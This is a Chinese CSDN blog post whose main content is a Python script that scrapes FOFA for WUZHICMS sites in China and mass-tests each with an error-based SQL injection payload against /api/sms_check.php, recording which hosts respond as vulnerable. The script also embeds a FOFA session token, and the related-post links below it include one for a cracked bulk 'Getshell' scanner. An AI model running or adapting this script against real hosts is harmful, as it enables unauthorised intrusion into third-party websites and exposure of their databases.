fofa批量测试cms_poc

已于 2023-06-07 15:51:09 修改
阅读量184 收藏
点赞数
文章标签: python
于 2023-06-07 15:49:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57053860/article/details/131089497
版权 
import base64
import requests
from lxml import etree
import time

headers = {
    'cookie':'fofa_token=eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MTY1NjQwLCJtaWQiOjEwMDA5NjQzMywidXNlcm5hbWUiOiJ0dXNpIiwiZXhwIjoxNjgwMTcwMTY3fQ.HKiAP08lKOwiFp_9tBHg0SqDKn6n_e9dTgLlAl2wxLYHTdLg5cK1PslhwWe99jOFaI41mosUCr3xGX0kbi87ww'
}
search_data='app="WUZHICMS" && country="CN"'
for yeshu in range(1,5):
    url = 'https://fofa.info/result?page=' + str(yeshu) + '&qbase64='
    search_data_bs = str(base64.b64encode(search_data.encode('utf-8')), 'utf-8')
    urls=url+search_data_bs
    try:
        print('正在提取第' + str(yeshu) + '页')
        result = requests.get(urls, headers=headers, verify=False).content
        # print(urls)
        # print(result.decode('utf-8'))
        soup = etree.HTML(result)
        ip_data = soup.xpath('//a[@target="_blank"]/@href')
        ipdata = '\n'.join(ip_data)
        print(ipdata)
        with open(r'ip.txt', 'a+') as f:
            f.write(ipdata + '\n')
            f.close()
    except Exception as e:
        time.sleep('0.5')
        pass

payload = '/api/sms_check.php?param=1%27%20or%20extractvalue(1,concat(0x7e,(select%20database())))%23'
for ip in open('ip.txt'):
    ip = ip.replace('\n', '')
    url = ip + payload
    try:
        res = requests.get(url, headers=headers, verify=False)
        if '~' in res.content.decode("utf-8"):
            print(url+ '|ok')
        else:
            print(url+ '|no')
        time.sleep(0.5)
    except Exception as e:
        pass
qq_57053860
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
TUI_CMS_POC:基于TUI JSON的CMSPOC
05-21
【TUI_CMS_POC:基于TUI JSON的CMSPOC】 TUI_CMS_POC是一个关于使用TUI JSON构建内容管理系统(CMS)的概念验证(Proof-of-Concept,POC)。这个项目主要展示了如何利用TUI JSON的技术来搭建一个功能完备、易于...
FOFA操作】fofa检索使用thinkphp框架的网站
SUSUYUA的博客
01-13 3170
fofa检索使用thinkphp框架的网站
【2】phpcms v9.6.0任意文件上传漏洞
司徒荆的博客
05-21 2539
phpcms v9.6.0任意文件上传漏洞
齐博CMSV7任意文件读取漏洞批量测试POC
m0_46371267的博客
04-22 1396
注:本poc为自己编写,请勿用于非法用途,第一次写poc,如有不妥请联系我。 # -*- coding:utf-8 -*- import requests import re import urllib import base64 def dakai(filename): with open(filename,'r',encoding='utf-8') as fp: # url_list = [] # for i in fp.readlines():
Kali使用FOFA资产检索收集信息——被动信息收集
wxqndm的博客
09-19 1190
FOFA 是一款非常强大的搜索引擎,FOFA (网络空间资产检索系统)是世界上数据覆盖更完整的IT设备搜索引擎,拥有全球联网IT设备更全的DNA信息。相对于shodan来说FOFA的优点就是更加本土化,拥有更多的域名数据,建立了全球最大的资产规则集,而且现在已经更新了识别蜜罐的功能。被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。一般带域名的好打开,注意纯ip的然后打开是乱码的,可能是钓鱼网站。同样是通过IP聚合去查看开放的服务和开放的端口。
CMSmap:Web内容管理系统漏洞扫描神器
最新发布
gitblog_00099的博客
04-10 372
CMSmap:Web内容管理系统漏洞扫描神器 项目地址:https://gitcode.com/dionach/CMSmap 项目简介 CMSmap 是一个开源的自动化工具,专门用于探测和识别Web内容管理系统的类型与版本,并评估其安全漏洞。由Dionach公司开发并维护,该项目旨在帮助网络安全专业人员和开发者更快更准确地发现网站可能存在的安全隐患,从而增强网络安全性。 技术分析 CMSmap基于...
04018717_POC_Project_POC_
09-29
标题中的"04018717_POC_Project_POC_"可能是一个项目标识符,表明这是一个关于POC(Proof of Concept)的工程,而"VIVADO"是Xilinx公司开发的一款综合型的硬件描述语言(HDL)设计工具,主要用于FPGA(Field-...
中国联通总部信息化软件POC验证测试管理规范_POC测试_
10-03
**中国联通总部信息化软件POC验证测试管理规范** POC(Proof of Concept)测试,也称为概念验证测试,是软件选型过程中的一个重要环节。在这个阶段,潜在的供应商或解决方案会被要求在实际环境中演示其功能、性能和...
POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配
09-21
标题中的“POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配”揭示了这个压缩包的内容主要涉及POC(Proof of Concept)在MATLAB环境中的应用,特别是关于POC过滤器和POC匹配算法,以及利用这些方法进行ROC...
poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc
09-22
标题中的“poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc”提到了一个VHDL实现的POC(Proof of Concept)项目,它是一个简单的控制程序,可能是针对红绿灯系统的模拟。这个项目主要关注如何用VHDL来构建和...
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
cms网站渗透的过程
MachineGunJoe666
05-06 956
1.通过fofa查询出该网站的后台,进去发现很像某cms,利用御剑的cms识别工具识别出对方是phpcms的站。 2.通过百度查询得出:该phpcms站点可能存在文件上传,敏感信息泄露,sql报错注入。我只验证出来了sql报错注入。 3.把这几个链接转发到burp的重放器: 1.1: http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1[1] 获取Set-Cookie: aOqWU_siteid用.
史上最全信息收集【非常详细 推荐收藏学习】
hackzkaq的博客
10-27 1292
TXT记录一般指为某个主机名或域名设置的说明,如:2)mail IN TXT "邮件主机, 存放在xxx ,管理人:AAA",Jim IN TXT "contact: abc@mailserver.com"也就是您可以设置 TXT ,以便使别人联系到您。如何检测TXT记录?1、进入命令状态;(开始菜单 - 运行 - CMD[回车]);2、输入命令" nslookup -q=txt 这里填写对应的域名或二级域名",查看返回的结果与设置的是否一致即可。
FrameScan CMS漏洞扫描
浅笑996的博客
06-28 686
工具简介 GithubL:https://github.com/qianxiao996/FrameScan FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。 支持平台 Windows Linux MAC(请自测) 工具特点 单URL批量检测 单URL单漏洞检测 单URL指定CMS检测 多
【终极FOFA组合语法指南】如何用FOFA打出组合拳搜索目标资产?
鹅子鱼的博客:很菜但是很好学的小菜鸟
04-20 5221
【终极FOFA组合语法指南】如何用FOFA更快、更准、更专地搜索目标资产?
骑士CMS文件包含+getshell漏洞复现(python自动化验证扫描漏洞)
走在搬砖的路上!
08-02 3315
简介 骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 +开源专业人才网站系统 公告地址: http://www.74cms.com/news/show-2497.html /Application/Common/Controller/BaseController.class.php文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行 影响版本 骑士 CMS < 6.0.48 环境搭建 这里使用phpstudy进.
CMS漏洞检测工具 – CMSmap
weixin_34248487的博客
01-05 1461
CMSmap是一个Python编写的针对开源CMS(内容管理系统)的安全扫描器,它可以自动检测当前国外最流行的CMS的安全漏洞。CMSmap主要是在一个单一的工具集合了不同类型的CMS的常见的漏洞。CMSmap目前只支持WordPress,Joomla和Drupal。 主要功能 1.其可以检测目标网站的cms基本类型,CMSmap默认自带一个WordPress,Joomla和Drup...
[工具使用]黑暗引擎FOFA
热门推荐
网络安全知识分享
08-29 3万+
黑暗引擎FOFAFOFA(点我进入)逻辑运算符搜索子域名domain搜索指定内容的host全部域名bodycert搜索选定应用的网站搜索指定开放端口的IP搜索指定协议的IP搜索IP或者网段的信息搜索指定CSS/JS网站常用的一些内容其他 FOFA(点我进入) 官网这样描述:FOFA是白帽汇推出的一款网络空间资产搜索引擎。它能够帮助用户迅速进行网络资产匹配、加快后续工作进程。例如进行漏洞影响范围分析、应用分布统计、应用流行度排名统计等。 简单理解就是,一个本土加强版shodan,知道某产品在互联网的部署情况、
Web漏洞扫描工具(批量脱壳、反序列化、CMS
antaidi1217的博客
01-01 1038
一、什么是Web漏洞扫描工具 即是指“扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具”,其中许多可能是由不安全或不正确的编码和设计。另一方面,通用(网络或系统)扫描器可以识别开放端口,主动IP地址和登录,主机操作系统和软件类型,修订版本和修补程序级别以及运行的服务。 二、漏洞扫描主要策略 1.主机漏洞扫描:通常在目标系统上安...
nuclei_poc
07-28
使用Nuclei可以通过命令运行脚本并生成测试报告。\[2\]\[3\] #### 引用[.reference_title] - *1* *2* *3* [POC模拟攻击利器 —— Nuclei入门(一)](https://blog.csdn.net/liwenxiang629/article/details/125995096...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值